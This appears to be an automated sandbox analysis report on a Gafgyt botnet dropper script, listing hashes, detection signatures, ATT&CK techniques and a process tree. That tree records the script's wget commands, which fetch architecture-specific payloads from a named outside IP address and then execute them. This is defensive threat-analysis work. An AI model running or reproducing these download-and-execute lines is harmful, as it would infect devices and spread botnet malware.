Analysis
-
max time kernel
21s -
max time network
25s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-01-2025 07:13
Static task
static1
Behavioral task
behavioral1
Sample
shell.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
shell.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
shell.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
shell.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
shell.sh
-
Size
327B
-
MD5
be3860edd084c6394d9894627d926283
-
SHA1
0084acbf7a34fece5ee66fd63b64234d5d2238d8
-
SHA256
d1f89f4c630323b37a6f669903f2e617a0616052c4b900e33d0b9eb41084514f
-
SHA512
06440f218923e2062a940299d2386762eb228d87a5407430191733865e122a0cb4a5c076b07ff9b5547933b80653555cbfcfc4b7d31eedcc6f132372d6be105a
Malware Config
Extracted
gafgyt
127.0.0.1:80
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral2/files/fstream-6.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 705 chmod 713 chmod 719 chmod 725 chmod 747 chmod 759 chmod 770 chmod 694 chmod 797 chmod 811 chmod 782 chmod 736 chmod 672 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/.z 689 .z /tmp/.z 702 .z /tmp/.z 710 .z /tmp/.z 716 .z /tmp/.z 722 .z /tmp/.z 732 .z /tmp/.z 744 .z /tmp/.z 755 .z /tmp/.z 766 .z /tmp/.z 778 .z /tmp/.z 792 .z /tmp/.z 806 .z /tmp/.z 817 .z -
resource yara_rule behavioral2/files/fstream-2.dat upx behavioral2/files/fstream-3.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp File opened for reading /proc/filesystems cp -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 715 wget 716 .z 707 rm 708 wget 710 .z 714 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.z shell.sh
Processes
-
/tmp/shell.sh/tmp/shell.sh1⤵
- Writes file to tmp directory
PID:663 -
/bin/rmrm -rf .z2⤵PID:664
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:666
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:672
-
-
/bin/rmrm -rf x86_642⤵PID:675
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/x86_64 -O -2⤵PID:678
-
-
/tmp/.z./.z x86_642⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm -rf .z2⤵PID:691
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:692
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:694
-
-
/bin/rmrm -rf i5862⤵PID:695
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/i586 -O -2⤵PID:697
-
-
/tmp/.z./.z i5862⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm -rf .z2⤵PID:703
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:704
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:705
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:707
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/mips -O -2⤵
- System Network Configuration Discovery
PID:708
-
-
/tmp/.z./.z mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:710
-
-
/bin/rmrm -rf .z2⤵PID:711
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:712
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:713
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
PID:714
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/mipsel -O -2⤵
- System Network Configuration Discovery
PID:715
-
-
/tmp/.z./.z mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:716
-
-
/bin/rmrm -rf .z2⤵PID:717
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:718
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:719
-
-
/bin/rmrm -rf armv4l2⤵PID:720
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv4l -O -2⤵PID:721
-
-
/tmp/.z./.z armv4l2⤵
- Executes dropped EXE
PID:722
-
-
/bin/rmrm -rf .z2⤵PID:723
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:724
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:725
-
-
/bin/rmrm -rf armv5l2⤵PID:726
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv5l -O -2⤵PID:727
-
-
/tmp/.z./.z armv5l2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm -rf .z2⤵PID:733
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:734
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:736
-
-
/bin/rmrm -rf armv6l2⤵PID:738
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv6l -O -2⤵PID:739
-
-
/tmp/.z./.z armv6l2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm -rf .z2⤵PID:745
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:746
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:747
-
-
/bin/rmrm -rf armv7l2⤵PID:749
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/armv7l -O -2⤵PID:751
-
-
/tmp/.z./.z armv7l2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm -rf .z2⤵PID:757
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:758
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:759
-
-
/bin/rmrm -rf powerpc2⤵PID:761
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/powerpc -O -2⤵PID:762
-
-
/tmp/.z./.z powerpc2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm -rf .z2⤵PID:767
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:768
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:770
-
-
/bin/rmrm -rf sparc2⤵PID:771
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/sparc -O -2⤵PID:773
-
-
/tmp/.z./.z sparc2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm -rf .z2⤵PID:779
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:781
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:782
-
-
/bin/rmrm -rf m68k2⤵PID:784
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/m68k -O -2⤵PID:785
-
-
/tmp/.z./.z m68k2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm -rf .z2⤵PID:793
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:795
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:797
-
-
/bin/rmrm -rf i6862⤵PID:799
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/i686 -O -2⤵PID:801
-
-
/tmp/.z./.z i6862⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm -rf .z2⤵PID:807
-
-
/bin/cpcp .z2⤵
- Reads runtime system information
PID:809
-
-
/bin/chmodchmod +x .z2⤵
- File and Directory Permissions Modification
PID:811
-
-
/bin/rmrm -rf sh42⤵PID:813
-
-
/usr/bin/wgetwget http://212.64.199.97/Simps/sh4 -O -2⤵PID:814
-
-
/tmp/.z./.z sh42⤵
- Executes dropped EXE
PID:817
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
66KB
MD533127be57dc9ff0d1ef1f51e613c5517
SHA14fde704f7e241a2d760bad03f3e2fa7b3267f70d
SHA256b9cc82bf75b97d7d94783ac1b33da7e842180af893d930812b79c186956707f5
SHA5120f864972b44b689bfe4a4da70b5e94ea281f2acd43b26227bf68b13c4075422092454ebb4254fd66d3650362aad978ec271187c6cffeb74ff94a3e5ef091c348
-
Filesize
62KB
MD55c086f6372f862e1b7a7f8b9fb9fa431
SHA1d09655cca5a41dfdbdafa1245411445efbb72449
SHA25671a55da4de94d324669f43a83e14a5b20154fefdf03b1051bad2ae181f314676
SHA5123c3f06257e1638e3fa6ff33ba107c5a49cba56429e0e0ec5c551864044c003263557102f7f9d7b1151c8d24099d4f28124672e0510ebb5629f3e71434dc26e30
-
Filesize
66KB
MD582999462377666d1c50486d94b4160ad
SHA158c62d44ff09fa07fe3d214e27b96e504eb62728
SHA2560df50e6986da2c391072e5e135f807b263b98f7303796278e4d60fa39a161cfd
SHA512cecabe8ad74d0c57f546c86b01d26dadf0cc8b436a8a2b6fece78bd158156f2e1c5b2270ea8c44e7e6a2eca0e690b119abd05f33f099301782a5356c86602fe6
-
Filesize
67KB
MD582a0a8e54c823931b1d3c9f043a760c0
SHA1e67075c0cdc2451355c425502660e35b3f97d827
SHA2562b2d11f90643979799af9d1e234d21234f75beb37fec69cd09418e3600c15c44
SHA5123781540bc763ffbfd8e6065ac6fd057eeb18b77873e3cb80f310ea34acf7443c4c335d366e392c862ffdb5a07552232b208075035a42dd14f395772d00d65b78
-
Filesize
221KB
MD5ba3641a22b6c6002cf3c94474a74ecee
SHA1781190657e1a92bc448912a5ca394180434fa8f9
SHA2565e9fdee0284c4b67992c106331a58cb6759187466b72bacdfb0659bd4db6f294
SHA51293b3cb8b5b39f59cf303a07fabfd01361ef2724a28496290074f18ed9abbeadd817fcbc70438fdd68f34f3c3ead518a32a4a2ce3914b68952bcd9a32fd6770ad